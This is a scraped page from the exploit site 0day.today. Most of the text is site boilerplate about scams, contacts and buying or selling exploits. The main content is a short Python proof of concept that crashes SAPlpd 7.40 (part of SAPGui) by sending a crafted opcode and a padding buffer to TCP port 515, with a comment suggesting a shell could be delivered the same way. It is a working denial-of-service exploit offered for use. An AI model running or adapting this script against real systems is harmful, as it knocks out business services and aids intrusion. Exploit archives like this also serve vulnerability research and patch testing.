0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SapLPD 7.40 - Denial of Service Exploit
# Exploit Title: SAPlpd 7.40 Denial of Service # Date: 2016-12-28 # Exploit Author: Peter Baris # Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip # Version: 7.40 all patch levels (as a part of SAPGui 7.40) # Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64 import socket # Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah # So you can modify the DoS accordingly # The added 800 A's are just to show, that you can deliver a complete shell with the command DoS = ("\x03"+"\x0a"+"\x41"*800) s = socket.socket() s.settimeout(1) s.connect(('192.168.198.132', 515)) print("[*] Crashing SAPlpd 7.40") print("[*] Payload length: "+str(len(DoS))+" bytes") s.send(DoS) s.close() # 0day.today [2024-11-15] #